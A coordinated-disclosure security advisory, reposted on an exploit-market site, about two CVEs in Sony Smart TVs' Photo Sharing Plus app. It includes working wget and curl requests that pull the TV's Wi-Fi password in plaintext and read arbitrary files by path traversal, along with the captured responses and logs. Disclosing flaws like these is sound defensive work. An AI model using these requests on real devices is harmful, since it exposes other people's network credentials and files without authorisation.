[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Sony Smart TV Information Disclosure / File Read Vulnerabilities

Author
xen1thLabs
Risk
[
Security Risk High
]
0day-ID
0day-ID-32585
Category
local exploits
Date add
24-04-2019
CVE
CVE-2019-10886
CVE-2019-11336
Platform
hardware
## ADVISORY INFORMATION

TITLE: Multiple vulnerabilities in Sony Smart TVs
ADVISORY URL: 
https://www.darkmatter.ae/blogs/security-flaws-uncovered-in-sony-smart-tvs/
DATE PUBLISHED: 23/04/2019
AFFECTED VENDORS: Sony
RELEASE MODE: Coordinated release
CVE: CVE-2019-10886, CVE-2019-11336
CVSSv3 for CVE-2019-10886: 6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVSSv3 for CVE-2019-11336: 6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)



## PRODUCT DESCRIPTION

Sony Smart TVs are provided with applications - adding more functionalities
for the customers - including the "Photo Sharing Plus" application.

The "Photo Sharing Plus" application running inside the Smart TV contains
several weaknesses. This application allows uploading pictures from Smartphone
to the TVs, in order to display them on a large screen.
When started, Photo Sharing Plus is turning the TV into a Wi-Fi access point
and shows a Wi-Fi password allowing customers to connect and share their media
content on the Sony Smart TVs. 



## DETAILS OF VULNERABILITIES

xen1thLabs has found multiple vulnerabilities in Sony products in October 2018
and xen1thLabs coordinated the disclosure of these vulnerabilities with Sony.
Two vulnerabilities have been found in the Sony Smart TVs by xen1thLabs while
auditing the security of Smart TVs.
The first vulnerability allows an attacker - without authentication from the
LAN/Wi-Fi - to retrieve the static Wi-Fi password created by the television
when the Photo Sharing Plus application is started.
The second vulnerability allows an attacker to read arbitrary files located in
the TV without authentication including valuable files. 

The summary of the vulnerabilities is:

- CVE-2019-10886 Sony Smart TV Photo Sharing Plus Arbitrary File Read
Vulnerability
- CVE-2019-11336 Sony Smart TV Photo Sharing Plus Information Disclosure
Vulnerability

The number of affected Sony models is very high and Sony has decided to remove
this vulnerable application from all models
(https://www.sony.com/electronics/support/televisions-projectors/articles/00204331).

Sony provided a non-exhaustive list of affected TV models from 2015-2016.
Recent models also are affected:

- KDL-50W800C
- KDL-50W805C
- KDL-50W807C
- KDL-50W809C
- KDL-50W820C
- KDL-55W800C
- KDL-55W805C
- KDL-65W850C
- KDL-65W855C
- KDL-65W857C
- KDL-75W850C
- KDL-75W855C
- XBR-43X830C
- XBR-49X800C
- XBR-49X830C
- XBR-49X835C
- XBR-49X837C
- XBR-49X839C
- XBR-55X805C
- XBR-55X807C
- XBR-55X809C
- XBR-55X810C
- XBR-55X850C
- XBR-55X855C
- XBR-55X857C
- XBR-65X800C
- XBR-65X805C
- XBR-65X807C
- XBR-65X809C
- XBR-65X810C
- XBR-65X850C
- XBR-65X855C
- XBR-65X857C
- XBR-75X850C
- XBR-75X855C
- XBR-55X900C
- XBR-55X905C
- XBR-55X907C
- XBR-65X900C
- XBR-65X905C
- XBR-65X907C
- XBR-65X930C
- XBR-75X910C
- XBR-75X940C
- XBR-75X945C
- XBR-43X800D
- XBR-49X800D
- XBR-49X835D
- XBR-55X850D
- XBR-55X855D
- XBR-55X857D
- XBR-65X850D
- XBR-65X855D
- XBR-65X857D
- XBR-75X850D
- XBR-75X855D
- XBR-75X857D
- XBR-85X850D
- XBR-85X855D
- XBR-85X857D
- XBR-55X930D
- XBR-65X930D
- XBR-65X935D
- XBR-65X937D
- XBR-75X940D
- XBR-100Z9D
- XBR-49X700D
- XBR-55X700D
- XBR-65X750D
- XBR-65Z9D
- XBR-75Z9D
- XBR-43X800E
- XBR-49X800E
- XBR-49X900E
- XBR-55A1E
- XBR-55X800E
- XBR-55X806E
- XBR-55X900E
- XBR-55X930E
- XBR-65A1E
- XBR-65X850E
- XBR-65X900E
- XBR-65X930E
- XBR-75X850E
- XBR-75X900E
- XBR-75X940E
- XBR-77A1E



### 1. CVE-2019-11336 Sony Smart TV Photo Sharing Plus Information Disclosure
Vulnerability

An unauthenticated remote attacker can retrieve the plaintext wireless password
through the "Photo Sharing Plus" API.

After starting the application, the following example retrieves the wireless
password created from the TV (IP address of the TV is 192.168.1.102) over the
LAN, without authentication:

```
root@kali:~# wget -qO- --post-data='{"id":80,"method":"getContentShareServerInfo","params":[],"version":"1.0"}' http://[ip_tv]:10000/contentshare/
{"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}
````

The password is 8362tbwX.

By reading logs of the TV, we can confirm the password has been delivered over
HTTP, without authentication. The logs contain password in plain-text:

```
01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}
````

It is also important to note that the generated Wireless password by the TV is
always the same. Even after a hard reboot and a disconnection from the power
supply, the generated password will be always the same. This lack of randomness
is also a security issue.



### 2. CVE-2019-10886 Sony Smart TV Photo Sharing Plus Arbitrary File Read
Vulnerability

It is possible to retrieve internal TV files over HTTP without authentication.

By default, images used by the Photo Sharing Plus application are stored inside
`/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/`.
The application starts an access point on the television and a HTTP daemon is
listening to a TCP port on this WLAN.
Furthermore, this daemon also listens on the LAN side of the television and it
is possible to retrieve these images from the LAN an image using this URL: 

http://[ip_tv]:10000/contentshare/image/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/LJYT0010.JPG

Browsing the address http://[ip_tv]:10000/contentshare/image/ allows getting
access to the root directory of the television running Android.

By exploiting this vulnerability, /default.prop (containing Android properties)
can be retrieved via http://192.168.1.102:10000/contentshare/image/default.prop:

```
root@kali:~# curl -v http://192.168.1.102:10000/contentshare/image/default.prop
Trying 192.168.1.102...
TCP_NODELAY set
Connected to 192.168.1.102 (192.168.1.102) port 10000 (#0)
> GET /contentshare/image/default.prop HTTP/1.1
> Host: 192.168.1.102:10000 
> User-Agent: curl/7.58.0
> Accept: /
>
< HTTP/1.1 200 OK
< Connection: close
< Content-Length: 591
< Content-Type: application/octet-stream
<
# 
# ADDITIONAL_DEFAULT_PROPERTIES
#
ro.secure=1
security.perf_harden=1
ro.allow.mock.location=0
ro.debuggable=0 ro.zygote=zygote32
dalvik.vm.image-dex2oat-Xms=64m
dalvik.vm.image-dex2oat-Xmx=64m
dalvik.vm.dex2oat-Xms=64m dalvik.vm.dex2oat-Xmx=512m
ro.dalvik.vm.native.bridge=0 debug.atrace.tags.enableflags=0 
# 
# BOOTIMAGE_BUILD_PROPERTIES 
# 
ro.bootimage.build.date=2016? 11? 14? ??? 15:34:56 JST ro.bootimage.build.date.utc=1479105296     ro.bootimage.build.fingerprint=Sony/BRAVIA_ATV2_PA/BRAVIA_ATV2:6.0.1/MMB29V.S50/1.6.0.06.14.0.00:user/release-keys persist.sys.usb.config=none

Closing connection 0 
````

Logs in the TV confirm the /default.prop file has been delivered over HTTP:

```
01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :/contentshare/image/default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]getLocalFilePath() start, uri=/contentshare/image/default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]loadType: /contentshare/image
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]localResPath: /default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]ext:.prop
01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Content Type :application/octet-stream
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]fileSize:591
01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response ... 591
01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response completed.
````


## DISCLOSURE TIMELINE

03/10/2018 - Vulnerabilities found
10/10/2018 - Report to Sony - Report to Sony Bug bounty program
through HackerOne
12/10/2018 - Confirmation of the reception of the bug report
15/10/2018 - xen1thLabs explains that the vulnerabilities are also exploitable
over HbbTV (DVB-{S,T,C}) - through HackerOne
29/10/2018 - Sony confirms the vulnerabilities
09/11/2018 - Sony confirms the patches will be available in March 2019 and asks
xen1thLabs to wait until April 2019
29/11/2018 - xen1thLabs sent the slides prior to xen1thLabs's HiTB 2018 Dubai
talk as agreed with Sony
14/01/2019 - Updates requested from xen1thLabs
15/01/2019 - Sony informs xen1thlabs that they are working on patches
27/01/2019 - Updates requested from xen1thLabs
07/03/2019 - Updates requested from xen1thLabs
15/03/2019 - Sony informs xen1thLabs that the agreed date for disclosure is not
possible because they don't know when they will be ready "maybe in a couple of
months"
17/03/2019 - Updates requested from Sony to understand and to publish a
security advisory. xen1thLabs also requests CVEs officially
20/03/2019 - xen1thLabs asks for an acceptable timeline
21/03/2019 - xen1thLabs sent an email to Secure@Sony.com due to the lack of
proper communication from Sony and informing Sony that in order to protect
their customers xen1thLabs needs to publish a security advisory  
21/03/2019 - Automatic response from Secure@Sony.com is no more in use. 
22/03/2019 - Sony is working on the patches and confirms the 12th April
26/03/2019 - xen1thLabs confirms the release date of the advisory and asks for
CVEs
01/04/2019 - Sony confirms the vulnerabilities affects some models and
"Sony plans to terminate Photo Sharing Plus service for all of models,
and that completion date is scheduled for April 12th, 2019."
16/04/2019 - Sony only provides one CVE instead of two. Sony states
"the wireless password recovery is within Sony's TV specification and is
expected behavior and Sony will not be submitting for a CVE regarding this"
17/04/2019 - xen1thLabs requests a CVE from MITRE
23/04/2019 - Public disclosure



## SOLUTION

Apply patches provided by Sony

#  0day.today [2024-12-24]  #